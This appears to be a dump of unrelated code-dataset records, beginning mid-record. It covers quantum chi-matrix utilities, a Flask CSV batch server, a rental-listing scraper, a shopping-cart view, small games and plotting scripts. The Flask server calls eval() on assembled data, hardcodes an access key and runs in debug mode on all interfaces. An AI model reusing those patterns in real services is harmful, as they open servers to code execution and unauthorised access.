np.kron(Bn[1].T,Bm[1].conj().T)\n chi[Bm[0],Bn[0]] = np.trace(basvect*SS)/np.trace(basvect*basvect.conj().T)\n return np.mat(chi*(2**n)/(np.trace(chi)*np.trace(np.matmul(bas[0].conj().T,bas[0]))))\n\ndef get_chi_from_chis(chi_list, bas, n, normalisation):\n S = get_supersuper_from_chi(chi_list[0],bas,n)\n for chi in chi_list[1:]:\n S = get_supersuper_from_chi(chi,bas,n)*S\n return get_chi_from_supersuper(S, bas, n)\n\ndef get_chi_error(chi, chi_bas, U, mode='p'):\n chi = np.mat(chi)\n U = np.mat(U)\n V = np.mat(np.zeros((len(chi_bas), len(chi_bas))), dtype='complex')\n mc = 0\n for i in range(len(chi_bas)):\n chi_bas[i] = np.mat(chi_bas[i])\n for m in chi_bas:\n nc = 0\n for n in chi_bas:\n if mode == 'p':\n V[mc, nc] = np.trace(m.H @ n @ U.H)\n if mode == 'n':\n V[mc, nc] = np.trace(m.H @ U.H @ n)\n nc += 1\n mc += 1\n return 
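A quick sanity check that get_pauli_basis() yields a trace-orthogonal set: for the unnormalised single-qubit basis, Tr(Pi† Pj) should equal 2·δij (the check itself is illustrative, not part of the original script):

import numpy as np

basis = [np.asarray(P) for P in get_pauli_basis(1, normalise=False)]
for i, Pi in enumerate(basis):
    for j, Pj in enumerate(basis):
        tr = np.trace(Pi.conj().T @ Pj)              # d * delta_ij with d = 2
        assert abs(tr - (2.0 if i == j else 0.0)) < 1e-12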
V @ chi @ V.H\n\ndef index(indices):\n indices.reverse()\n ind = 0\n for i in range(len(indices)):\n ind += indices[i]*(4**i)\n return ind\n\ndef swap_qubits_chi(chi,q1,q2,n):\n Perm = np.zeros_like(chi)\n for indices in itt.product(range(4),repeat = n):\n indices = list(indices)\n indicesnew = indices.copy()\n ind1 = index(indices)\n indicesnew[q2] = indices[q1]\n indicesnew[q1] = indices[q2]\n ind2 = index(indices)\n Perm[ind1,ind2] = 1\n Perm[ind2,ind1] = 1\n return Perm\n\ndef get_trace_S(n):\n Tr = np.zeros((2**(2*(n-1)),2**(2*n)),dtype = 'complex')\n Iten = 1\n for i in range(n-1):\n Iten = np.kron(Iten, I)\n for i in [0,1]:\n k = np.zeros((1,2),dtype = 'complex')\n k[0,i] = 1\n bas = np.kron(Iten,k)\n Tr += np.kron(bas,bas)\n return Tr\n\n#def chi_trace_q(chi,n,q):\n# nontrace = list(range(n))\n# nontrace.remove(q)\n# dtraced = 2**(2*(n-1))\n# chi_traced = np.zeros((dtraced,dtraced))\n# for m in itt.product(range(4),repeat = (n-1)):\n# for n in itt.product(range(4), repeat = (n-1)):\n# \ndef chi3_trace_3(chi):\n chi_traced = np.zeros((16,16),dtype='complex')\n for m in itt.product(range(4),repeat = 2):\n mtraced = 4*m[0]+m[1]\n mold = 16*m[0]+4*m[1]\n for n in itt.product(range(4), repeat = 2):\n ntraced = 4*n[0]+n[1]\n nold = 16*n[0]+4*n[1]\n chi_traced[mtraced,ntraced] = chi[mold,nold]\n return chi_traced/np.trace(chi_traced)\n \n\n#%%\nnormalisation = False\n\nP1 = get_pauli_basis(1,normalise = normalisation)\nP2 = get_pauli_basis(2,normalise = normalisation)\nP3 = get_pauli_basis(3,normalise = normalisation)\n\nP2norm = get_pauli_basis(2, normalise = True)\nP3norm = get_pauli_basis(3, normalise = True)\n\nH = (1/sq2)*(X+Z)\n\nHI = np.kron(H,I)\nIH = np.kron(I,H)\nHH = HI * IH\n\nCX = np.mat([[1, 0, 0, 0],[0, 1, 0, 0],[0, 0, 0, 1],[0, 0, 1, 0]])\nSWAP = np.mat([[1, 0, 0, 0],[0, 0, 1, 0],[0, 1, 0, 0],[0, 0, 0, 1]])\nSWAPI = np.kron(SWAP,I)\n\nICX = np.kron(I,CX)\nCXI = np.kron(CX,I)\n\nISWAP = np.kron(I,SWAP)\nCIX = CXI * ISWAP\n\n\nc1_H = U_to_chi(H,1, normalisation)\nc2_HI = U_to_chi(HI,2, normalisation)\nc2_IH = U_to_chi(IH,2, normalisation)\n\n\nc2_SWAP = U_to_chi(SWAP, 2, normalisation)\nc2_CX = U_to_chi(CX, 2, normalisation)\n\nc3_HII = right_ext_chi(c2_HI,2)\nc3_IHI = right_ext_chi(c2_IH,2)\nc3_IIH = left_ext_chi(c2_IH,2)\nc3_SWAPI = right_ext_chi(c2_SWAP,2)\nc3_CXI = right_ext_chi(c2_CX,2)\nc3_ICX = left_ext_chi(c2_CX,2)\n\n\n\nS2_HI = get_supersuper_from_chi(c2_HI, P2,2)\nS2_IH = get_supersuper_from_chi(c2_IH, P2,2)\nS2_CX = get_supersuper_from_chi(c2_CX, P2,2)\n\nS3_SWAPI = get_supersuper_from_chi(c3_SWAPI, P3, 3)\nS3_HII = get_supersuper_from_chi(c3_HII, P3, 3)\nS3_IHI = get_supersuper_from_chi(c3_IHI, P3, 3)\nS3_IIH = get_supersuper_from_chi(c3_IIH, P3, 3)\n\nS3_CXI = get_supersuper_from_chi(c3_CXI, P3, 3)\nS3_ICX = get_supersuper_from_chi(c3_ICX, P3, 3)\nS3_CIX = S3_SWAPI @ S3_ICX @ S3_SWAPI\n","sub_path":"Functions/Simpleerrorfunc.py","file_name":"Simpleerrorfunc.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"292066985","text":"from tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom time import strftime\r\n\r\n# clock user interface\r\nUI = Tk()\r\nUI.title(\"Digital Clock\")\r\n\r\n\r\n# defining the time format\r\ndef time():\r\n time_format = strftime(\"%H: %M: %S %p\")\r\n label.config(text=time_format)\r\n label.after(1000, time)\r\n\r\n\r\n# variable to contain the clock\r\nlabel = Label(UI, font=(\"ds-digital\", 80), background=\"black\", 
foreground=\"cyan\")\r\nlabel.pack(anchor=\"center\")\r\ntime()\r\n\r\nmainloop()","sub_path":"Digital_Clock/digital_clock.py","file_name":"digital_clock.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"382256321","text":"from flask import Flask, request, json, make_response\nimport pandas as pd\nfrom flask_restful import reqparse\nfrom google.protobuf import json_format\n\nfrom static import dataCommunication_pb2\n\napp = Flask(__name__)\nRFW = \"jf3458rw-3rjdc134fr-a1eif03r52\"\nchunk_list = []\n\n\ndef getCol(value):\n v = value.lower()\n functions = {\n 'cpu': 1,\n 'networkin': 2,\n 'networkout': 3,\n 'memory': 4\n }\n return functions.get(v)\n\n\n@app.route('/v1/batches/json', methods=['POST'])\ndef receive_json_request():\n print(\"json request received\")\n parser = reqparse.RequestParser()\n parser.add_argument('branch', type=str)\n parser.add_argument('datasetType', type=str)\n # 一次取得数量,多少个bench也要根据这个来定\n parser.add_argument('workloadMetric', type=str)\n parser.add_argument('batchUnit', type=int)\n parser.add_argument('batchId', type=int)\n parser.add_argument('batchSize', type=int)\n parser.add_argument('RFWID', type=str)\n args = parser.parse_args()\n result = request_analy_json(args)\n return make_response(result, 200)\n\n\n\n\n@app.route('/v1/batches/proto', methods=['POST','GET'])\n# proto去解析\ndef receive_proto_request():\n print(\"receive proto request\")\n reqs = dataCommunication_pb2.Request()\n reqs.ParseFromString(request.get_data().replace(b'\\r\\n', b'\\n'))\n if rfw_check(reqs.RFW_ID) is False:\n return\n result = request_analy_proto(reqs)\n print(\"final result is :\",result)\n parsed_pb = json_format.Parse(result, dataCommunication_pb2.Response(), ignore_unknown_fields=False)\n return make_response(parsed_pb.SerializeToString(), 200)\n\n\ndef rfw_check(str):\n if str != RFW:\n return False\n return True\n\n\ndef request_analy_proto(reqs):\n return _getDataFrame(reqs)\n\n\ndef _getDataFrame(reqs):\n file_name = \"./static/\"\n type = reqs.branch\n if type.lower() == 'dell':\n file_name = '{}{}'.format(file_name,'NDBench-')\n else :\n file_name = '{}{}'.format(file_name,'DVD-')\n file_name = '{}{}{}'.format(file_name,reqs.dataset_type,'.csv')\n print('file name is: ',file_name)\n metric = reqs.workload_metric\n col_index = getCol(metric)\n batchSize = reqs.batch_size\n batchID = reqs. 
batch_id\n unit = reqs.batch_unit\n reader = pd.read_csv(file_name, usecols=[col_index], chunksize=unit, iterator=True)\n chunk_str = ''\n for chunk in reader:\n chunk_list.append(chunk)\n count = 0;\n last_batch_size = 0;\n while count < batchSize:\n count += 1\n next_str = chunk_list[batchID + count].to_json(orient=\"values\", force_ascii=False).replace('[', '').\\\n replace(']','')\n if count == batchSize-1:\n last_batch_size = chunk_list[batchID + count].shape[0]\n print(\"last batch size: \", last_batch_size)\n chunk_str = '{},{}'.format(chunk_str,next_str)\n new_str = chunk_str[1:]\n print(\"After Refactor: \", new_str)\n chunk_json = eval(new_str)\n return to_json_for_pb(batchSize,batchID + count-1, last_batch_size,metric, chunk_json)\n\ndef request_analy_json(args):\n if args.get('RFWID') != RFW:\n return\n file_name = \"./static/\"\n type = args.get('branch')\n metric = args.get('workloadMetric')\n col_index = getCol(metric)\n batchUnit = args.get('batchUnit')\n batchSize = args.get('batchSize')\n dataset_type = args.get('datasetType')\n batchID = args.get('batchId')\n if type.lower() == 'dell':\n print(\"request is dell dataset\")\n file_name = '{}{}'.format(file_name,'NDBench-')\n else :\n print(\"request is netflix dataset\")\n file_name = '{}{}'.format(file_name,'DVD-')\n file_name = '{}{}{}'.format(file_name,dataset_type,'.csv')\n print('file name is: ',file_name)\n reader = pd.read_csv(file_name, usecols=[col_index], chunksize=batchUnit,\n iterator=True)\n chunk_str = ''\n for chunk in reader:\n chunk_list.append(chunk)\n count = 0\n while count < batchSize:\n count += 1\n next_str = '[{}]'.format(chunk_list[batchID + count].to_json(orient=\"values\", force_ascii=False).replace('[', '').\\\n replace(']',''))\n print(\"Slice: \", next_str)\n chunk_str = '{},{}'.format(chunk_str,next_str)\n new_str = chunk_str[1:]\n if batchSize ==1:\n new_str = '[{}]'.format(new_str)\n print(\"After Refactor: \", new_str)\n chunk_json = eval(new_str)\n return to_json(batchID, metric, chunk_json)\n\n\n# {\n# \"SUCCESS\": \"SUCCESS\",\n# \"workload_data\": {\n# \"0\": [\n# [\n# 260661198\n# ],\n# [\n# 280470095\n# ],\n# [\n# 286492234\n# ],\n# [\n# 280274041\n# ],\n# [\n# 267113409\n# ]\n# ],\n# \"1\": [\n# [\n# 260661198\n# ],\n# [\n# 280470095\n# ],\n# [\n# 286492234\n# ],\n# [\n# 280274041\n# ],\n# [\n# 267113409\n# ]\n# ]\n# }\n# }\n\ndef to_json_for_pb(batchSize,batch_id, last_batch_size, metrics, chunk_str):\n before_json = {\n 'last_batch_ID': batch_id, 'batch_amount':batchSize,'last_batch_size': last_batch_size, 'RFW_ID': RFW, 'workload_metrics': metrics, 'workload_data': chunk_str\n }\n print('After Jsonify: ', json.dumps(before_json))\n return json.dumps(before_json)\n\ndef to_json(batch_id, metrics, chunk_str):\n before_json = {\n 'last_batch_ID': batch_id, 'RFW_ID': RFW, 'workload_metrics': metrics, 'workload_data': chunk_str\n }\n print('After Jsonify: ', json.dumps(before_json))\n # rr = {\"RFW_ID\": \"jf3458rw-3rjdc134fr-a1eif03r52\", \"last_batch_ID\": 1, \"workload_data\":\n # [\"239635160\", \"215437697\"], \"workload_metrics\": \"cpu\"}\n return json.dumps(before_json)\n\n\ndef after_request(resp):\n resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n\napp.after_request(after_request)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
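server.py re-reads the whole CSV and appends every chunk to the module-level chunk_list on each request, so memory grows across requests. A leaner sketch that streams only the requested batches with pandas' chunked reader (read_batches and its arguments are hypothetical stand-ins for the request fields above):

import pandas as pd

def read_batches(path, col_index, unit, batch_id, batch_size):
    reader = pd.read_csv(path, usecols=[col_index], chunksize=unit)
    rows = []
    for i, chunk in enumerate(reader):
        if batch_id <= i < batch_id + batch_size:
            rows.extend(chunk.iloc[:, 0].tolist())
        elif i >= batch_id + batch_size:
            break                      # stop reading once past the window
    return rows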
+{"seq_id":"442944689","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nfrom collections import OrderedDict\nimport json\nimport requests\nimport sys\nimport argparse\nimport io\nimport pytesseract\nfrom PIL import Image\n\nheaders = {\n 'User-agent': 'Report abuse: me@frankchang.me',\n}\n\ndef fetch_info(link):\n return requests.get(link, headers=headers).text.encode('utf-8')\n\ndef parse_label_list(soup):\n labels = soup.select('ul.clearfix.labelList.labelList-1')[0]\n labellist = []\n\n for li in labels.select('li.clearfix'):\n for div in li.select('div.one'):\n key = div.getText().replace(u' ','')\n value = div.findNextSibling('div', {'class': 'two'}).em.getText()\n labellist.append((key, value))\n\n return OrderedDict(labellist)\n\ndef parse_facility(soup):\n facilities = []\n no_facilities = []\n\n #facilityList = soup.findChildren('ul', {'class': 'facility clearfix'})[0]\n facilityList = soup.select('ul.facility.clearfix')[0]\n for facility in facilityList.findChildren('li'):\n if 'no' in facility.span['class']:\n no_facilities.append(facility.getText())\n else:\n facilities.append(facility.getText())\n\n return (facilities, no_facilities)\n\ndef parse_photos(soup):\n imgEles = soup.select('div.imgList')[0].findChildren('img')\n imgUrlList = []\n for img in imgEles:\n imgUrlList.append(img['src'].replace('_125x85.crop.jpg', '_765x517.water3.jpg'))\n\n return imgUrlList\n\ndef parse_info(soup):\n info = OrderedDict()\n\n infoSection = soup.select('div.detailInfo.clearfix')[0]\n priceSec = infoSection.select('div.price.clearfix')[0]\n explainSec = infoSection.select('div.explain')[0]\n attrs = infoSection.select('ul.attr li')\n\n price = priceSec.i.getText().replace(u' ','').replace('\\xa0','').replace(u' ','')\n explain = explainSec.getText().replace(u' ', '').replace('\\xa0', '')\n info[u'租金'] = u\"{0} ({1})\".format(price, explain)\n\n for attr in attrs:\n info.update((tuple(attr.getText().replace(u' ', '').replace('\\xa0', '').split(':')),))\n\n return info\n\ndef parse_status(soup):\n return soup.select('div.houseIntro')[0].getText().replace(' ', ' ')\\\n .replace('
', '\\n').replace(' ', '').replace('\\xa0', '').replace('\\r\\n','\\n')\n\ndef parse_phone_number(soup):\n phoneImg = soup.select('span.num')\n if phoneImg[0].img:\n phoneImgUrl = phoneImg[0].img['src'].replace('//', 'https://')\n rep = requests.get(phoneImgUrl, headers=headers).content\n image = Image.open(io.BytesIO(rep))\n\n return pytesseract.image_to_string(image).replace(' ','')\n\n return None\n\ndef get_591_info(link):\n info = OrderedDict()\n\n raw = fetch_info(link)\n soup = BeautifulSoup(raw, 'html.parser')\n facility_info = parse_facility(soup)\n\n info[u'標題'] = soup.select('span.houseInfoTitle')[0].getText()\n info[u'地址'] = soup.select('span.addr')[0].getText()\n info[u'網址'] = link\n info[u'照片'] = parse_photos(soup)\n info[u'聯絡方式'] = parse_phone_number(soup)\n\n info.update(parse_info(soup))\n info[u'房東提供'] = facility_info[0]\n info[u'房東不提供'] = facility_info[1]\n info.update(parse_label_list(soup))\n info[u'屋況'] = parse_status(soup)\n\n return info\n \ndef main():\n parser = argparse.ArgumentParser(\n description='Fetch data from 591 and return a json string')\n parser.add_argument(\n 'url', metavar='url', nargs='+')\n\n args = parser.parse_args()\n info_list = []\n\n for link in args.url:\n info = get_591_info(link)\n info_list.append(info)\n\n if len(info_list) == 1:\n print(info_list[0])\n print(json.dumps(info_list[0], ensure_ascii=False, indent=4))\n else:\n print(json.dumps(info_list, ensure_ascii=False, indent=4))\n\nif __name__ == '__main__':\n main()\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"73892134","text":"__author__ = 'GitHub:Air-Zhuang'\n\nfrom flask import render_template, jsonify, request\nfrom flask_login import login_required, current_user\n\nfrom app.models.cart import Cart\nfrom app.view_models.cart_view_model import CartCollection\nfrom app.view_models.user_view_model import UserViewModel\nfrom . 
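parse_phone_number() in parse.py OCRs the listing's phone-number image. The same idea in isolation — a sketch assuming Tesseract is installed locally; ocr_image is a hypothetical name and the URL is supplied by the caller:

import io
import requests
import pytesseract
from PIL import Image

def ocr_image(url, headers=None):
    raw = requests.get(url, headers=headers, timeout=10).content
    image = Image.open(io.BytesIO(raw))
    return pytesseract.image_to_string(image).replace(' ', '')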
import web\nfrom app.models.base import db\nfrom app.models.goods import Goods\n\n\n@web.route('/cart/')\n@login_required\ndef cart(gid):\n resp_data = {'code': 200, 'msg': '查询成功~~', 'data': {}}\n addNav(resp_data)\n uid = current_user.id\n cart = Cart()\n goods = Goods()\n\n if gid != '0': # gid=0表示从nav跳转过来,不是0表示从详情页跳转过来,git>0表示添加一台,git<0表示减少一台\n abs_gid=abs(int(gid))\n num = cart.getNum(uid, abs_gid)\n goods_info = goods.getCartWantDict(abs_gid)\n if int(gid)>0:\n if num > 0: # 如果存在数量加1,不存在变成1\n total_price = cart.getTotalPrice(uid=uid, gid=gid) # 得到现在的总价\n with db.auto_commit():\n cart.query.filter_by(uid=uid, gid=gid).update({'num': num + 1, 'total_price': total_price + goods_info['price']})\n elif num == 0:\n with db.auto_commit():\n cart.gid = gid\n cart.uid = uid\n cart.num = 1\n cart.goods_name = goods_info['goods_name']\n cart.goods_img = goods_info['goods_img']\n cart.price = goods_info['price']\n cart.cpu = goods_info['cpu']\n cart.ram = goods_info['ram']\n cart.memory = goods_info['memory']\n cart.video_card = goods_info['video_card']\n cart.size = goods_info['size']\n cart.cate_company = goods_info['cate_company']\n cart.total_price = goods_info['price']\n db.session.add(cart)\n elif int(gid)<0:\n total_price = cart.getTotalPrice(uid=uid, gid=abs_gid)\n with db.auto_commit():\n cart.query.filter_by(uid=uid, gid=abs_gid).update({'num': num - 1, 'total_price': total_price - goods_info['price']})\n\n userAllCartList = cart.getUserAllCartList(uid)\n cartCollection = CartCollection(userAllCartList)\n resp_data['data'] = cartCollection.data\n return render_template('cart.html', data=resp_data)\n\n@web.route('/cart_delete/')\n@login_required\ndef cart_delete(gid):\n resp_data = {'code': 200, 'msg': '查询成功~~', 'data': {}}\n addNav(resp_data)\n uid = current_user.id\n cart = Cart()\n\n if gid==\"delete_all\":\n with db.auto_commit():\n cart.query.filter_by(uid=uid).delete()\n else:\n with db.auto_commit():\n cart.query.filter_by(uid=uid, gid=gid).delete()\n\n userAllCartList=cart.getUserAllCartList(uid)\n cartCollection=CartCollection(userAllCartList)\n resp_data['data']=cartCollection.data\n return render_template('cart.html', data=resp_data)\n\n\ndef addNav(resp_data):\n if current_user.is_active: # addUserInfo\n userviewmodel = UserViewModel(current_user)\n resp_data['user'] = userviewmodel.data\n companys = Goods.getDistinctCompany() # addCompanyList\n resp_data['companys'] = companys\n","sub_path":"app/web/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"15088782","text":"\"\"\"Agent Server Entrypoint.\"\"\"\n\n# Standard Library\nimport logging\n\n# Third Party\nfrom rpyc.utils.server import ThreadedServer\n\n# Project\nfrom rsagent.config import params\nfrom rsagent.services.main import Agent\n\nlogger = logging.getLogger(f\"{__package__}.{__name__}\")\n\n\nif __name__ == \"__main__\":\n server = ThreadedServer(\n Agent,\n hostname=str(params.listen_address),\n port=params.listen_port,\n ipv6=True,\n logger=logger,\n )\n server.start()\n","sub_path":"rsagent/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"302870181","text":"import pygame\nfrom pygame.sprite import Group\n\nfrom settings import Settings\nfrom ship import Ship\nfrom alien import Alien\nimport game_functions\ndef run_game():\n ai_settings=Settings()\n 
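The cart() view implements update-or-insert by hand: count matching rows, then either UPDATE num/total_price or INSERT a fresh row. The same pattern as a compact sketch in Flask-SQLAlchemy style (add_to_cart is a hypothetical helper; it assumes the Cart model's columns shown above):

def add_to_cart(db, Cart, uid, gid, unit_price):
    row = Cart.query.filter_by(uid=uid, gid=gid).first()
    if row is None:
        db.session.add(Cart(uid=uid, gid=gid, num=1, total_price=unit_price))
    else:
        row.num += 1
        row.total_price += unit_price
    db.session.commit()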
pygame.init()\n screen=pygame.display.set_mode((ai_settings.screen_width,ai_settings.screen_height))\n pygame.display.set_caption(\"Alien Invasion\")\n ship=Ship(screen,ai_settings)\n bullets=Group() \n aliens=Group()\n while True:\n game_functions.check_event(ai_settings,screen,ship,bullets)\n game_functions.update_screen(ai_settings,screen,ship,bullets,aliens)\n game_functions.update_bullet(bullets)\n pygame.display.flip()\n \n\nrun_game()","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"454315867","text":"import copy\nfrom ctapipe.utils import get_dataset_path\nfrom ctapipe.io.simteleventsource import SimTelEventSource\n\ndataset = get_dataset_path(\"gamma_test.simtel.gz\")\n\ndef test_hessio_file_reader():\n with SimTelEventSource(input_url=dataset) as reader:\n assert reader.is_compatible(dataset)\n assert not reader.is_stream\n for event in reader:\n if event.count == 0:\n assert event.r0.tels_with_data == {38, 47}\n elif event.count == 1:\n assert event.r0.tels_with_data == {11, 21, 24, 26, 61, 63, 118,\n 119}\n else:\n break\n for event in reader:\n # Check generator has restarted from beginning\n assert event.count == 0\n break\n\n # test that max_events works:\n max_events = 5\n with SimTelEventSource(input_url=dataset, max_events=max_events) as reader:\n count = 0\n for _ in reader:\n count += 1\n assert count == max_events\n\n # test that the allowed_tels mask works:\n with SimTelEventSource(input_url=dataset, allowed_tels={3, 4}) as reader:\n for event in reader:\n assert event.r0.tels_with_data.issubset(reader.allowed_tels)\n\n\ndef test_that_event_is_not_modified_after_loop():\n\n dataset = get_dataset_path(\"gamma_test.simtel.gz\")\n with SimTelEventSource(input_url=dataset, max_events=2) as source:\n for event in source:\n last_event = copy.deepcopy(event)\n\n # now `event` should be identical with the deepcopy of itself from\n # inside the loop.\n # Unfortunately this does not work:\n # assert last_event == event\n # So for the moment we just compare event ids\n assert event.r0.event_id == last_event.r0.event_id\n","sub_path":"ctapipe/io/tests/test_simtel_event_source.py","file_name":"test_simtel_event_source.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"141810284","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport sys\r\nimport csv\r\n\r\nlink_list = []\r\n\r\nwith open(\"unicode_pages_2nd_tier.csv\") as f:\r\n for subpage in map(str.strip,f): # Number of pages plus one\r\n url = \"http://www.unicode.org/{}\".format(subpage)\r\n\r\n uni_page = requests.get(url)\r\n\r\n if uni_page.status_code != 200:\r\n print (\"there was an error with\", url)\r\n\r\n\r\n page_html = uni_page.text\r\n\r\n page_html = page_html.encode('ascii', 'ignore').decode('ascii')\r\n\r\n soup = BeautifulSoup(page_html, \"html.parser\")\r\n #\r\n for link in soup.find_all(\"a\"):\r\n alink = link.get('href')\r\n # for lnk in alink:\r\n with open('unicode_links_2nd.csv', 'a') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([subpage, alink])\r\n\r\n print(subpage, alink)\r\n # # story_table = soup.find_all(\"td\", attrs = {\"style\" : \"border: 0px solid rgb(116, 116, 116);\"})\r\n # #\r\n # # for table_row in story_table:\r\n # # a_row = table_row.find_all(\"table\", attrs = {\"width\" : \"98%\"})\r\n # #\r\n # # for row 
in a_row:\r\n # # a_link = row.find_all(\"a\")\r\n # #\r\n # for the_link in page_links:\r\n # a_link = the_link.find_all(\"href\")\r\n # link_list.append(a_link)\r\n#CURRENTLY: (NOON 6/30) IS NOT WRITING TO A LIST, JUST LOOPING THROUGH AND LOOKING.\r\n#NEED TO GET JUST THE HREF, WITHOUT AN IDIOT ERROR.\r\n#WHY\r\n\r\n#\r\n # print(link.get(\"href\")) this successfully prints the links\r\n# #\r\n\r\n#okay, it just needs to be inside another loop so it doesn't overwrite, and I think you'll have it\r\n","sub_path":"unicode_links.py","file_name":"unicode_links.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"4791647","text":"'''Functions for cleaning data'''\n\nfrom typing import List\nfrom model_types import (Example, ExampleBuckets, Dataset, EncodingLength, Triplet,\n Triplets, LossInputType)\n\ndef dataset_to_buckets(dataset: Dataset) -> ExampleBuckets:\n '''\n Turns a dataset of (examples, labels) into a list of buckets:\n [[examples labeled 0], [examples labeled 1], ...]\n '''\n examples, labels = dataset\n example_buckets: List[List[Example]] = []\n max_label = max(labels)\n for bucket_index in range(max_label + 1): # pylint: disable = unused-variable\n example_buckets.append([])\n\n for example_index, example_value in enumerate(examples):\n bucket_number = labels[example_index]\n value = example_value.flatten() # assumes that its a numpy ndarray\n example_buckets[bucket_number].append(value)\n\n assert True not in [len(bucket) < 2 for bucket in example_buckets], \"Each label must have at least two examples to be trained with triplet loss\"\n\n return example_buckets\n\ndef get_zeroed_pred_triplets(amount: int, output_size: EncodingLength) -> LossInputType:\n '''\n Returns a list of zeroed triplets that fools Keras into thinking this is the true predicted values\n Generally used because using K.zeros_like causes my computer to freeze for some reason.\n '''\n\n return [[[0] * output_size * 3] * amount]\n\ndef isolate_triplet(triplet_index: int, triplets: Triplets) -> Triplets:\n '''\n Isolates a particular triplet from within many triplets\n Return value can be passed to the triplet model\n '''\n return [[triplets[0][triplet_index]], [triplets[1][triplet_index]], [triplets[2][triplet_index]]]\n\ndef get_triplet(triplet_index: int, triplets: Triplets) -> Triplet:\n '''\n Gets a particular triplet from triplets\n Return value can be passed to the encoder model\n '''\n return [triplets[0][triplet_index], triplets[1][triplet_index], triplets[2][triplet_index]]\n","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"604771724","text":"'''\nDeveloper: Adam M. 
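A tiny illustration of dataset_to_buckets() from data_cleaning.py: two labels with two (made-up) examples each, bucketed by label index — each bucket must hold at least two examples or the assertion in the function fires:

import numpy as np

examples = [np.array([0.0, 1.0]), np.array([1.0, 0.0]),
            np.array([2.0, 2.0]), np.array([3.0, 3.0])]
labels = [0, 1, 0, 1]
buckets = dataset_to_buckets((examples, labels))
# buckets[0] holds the flattened arrays labeled 0, buckets[1] those labeled 1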
Terwilliger\nVersion: February 12, 2018\nPurpose: CSE 802 -- HW1 - Q1\nDetails: Pattern Recognition course at MSU\n\t\t explore well-known Iris dataset\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# iris dataset metadata\ncolors = ['red', 'blue', 'green']\nlabel_names = ['setosa', 'versicolor','virginica']\nfeat_names = ['sepal length in cm (x1)', 'sepal width in cm (x2)', 'petal length in cm (x3)','petal width in cm (x4)']\nfeats = np.zeros((150,4))\nlabels = np.zeros((150,1)).astype(np.int)\n\n# read iris data into numpy arrays\niris_file = open('iris_data.txt')\nline_num = 0\nfor line in iris_file:\n\tlineParts = line.rstrip().split('\\t')\n\tcurr_feat = lineParts[:4]\n\tcurr_feat = [float(x) for x in curr_feat]\n\tfeats[line_num] = curr_feat\n\tlabels[line_num] = int(lineParts[-1])\n\tline_num +=1\n\n# part a - plot histograms for feats per class\nfor feat_plot in range(feats.shape[1]):\t\n\tfor label in np.unique(labels):\n\t\tcurr_plot = []\n\t\tfor feat_num in range(len(feats)):\n\t\t\tif labels[feat_num] == label:\n\t\t\t\tcurr_plot.append(feats[feat_num, feat_plot])\n\n\t\tplt.hist(curr_plot, color=colors[label-1], label=label_names[label-1])\n\tplt.title(feat_names[feat_plot])\n\tplt.legend()\n\tplt.show()\n\n# part b - plot scatter for feat 1/2 and feat 1/4\ncomparison = [[0,1], [0,3]]\nfor comp in comparison:\t\n\tfor label in np.unique(labels):\n\t\tfeat0_plot = []\n\t\tfeat1_plot = []\n\t\tfor feat_num in range(len(feats)):\n\t\t\tif labels[feat_num] == label:\n\t\t\t\tfeat0_plot.append(feats[feat_num, comp[0]])\n\t\t\t\tfeat1_plot.append(feats[feat_num, comp[1]])\n\n\t\tplt.scatter(feat0_plot, feat1_plot, color=colors[label-1], label=label_names[label-1])\n\tplt.xlabel(feat_names[comp[0]])\n\tplt.ylabel(feat_names[comp[1]])\n\t#plt.title(feat_names[feat_plot])\n\tplt.legend()\n\tplt.show()\n\n# part c - plot 3d scatter for feat 1/2/4\ncomparison = [[0,1,3]]\nfor comp in comparison:\n\tfig = plt.figure()\n\tax = fig.add_subplot(111, projection='3d')\t\n\tfor label in np.unique(labels):\n\t\tfeat0_plot = []\n\t\tfeat1_plot = []\n\t\tfeat2_plot = []\n\t\tfor feat_num in range(len(feats)):\n\t\t\tif labels[feat_num] == label:\n\t\t\t\tfeat0_plot.append(feats[feat_num, comp[0]])\n\t\t\t\tfeat1_plot.append(feats[feat_num, comp[1]])\n\t\t\t\tfeat2_plot.append(feats[feat_num, comp[2]])\n\n\t\tax.scatter(feat0_plot, feat1_plot, feat2_plot, color=colors[label-1], 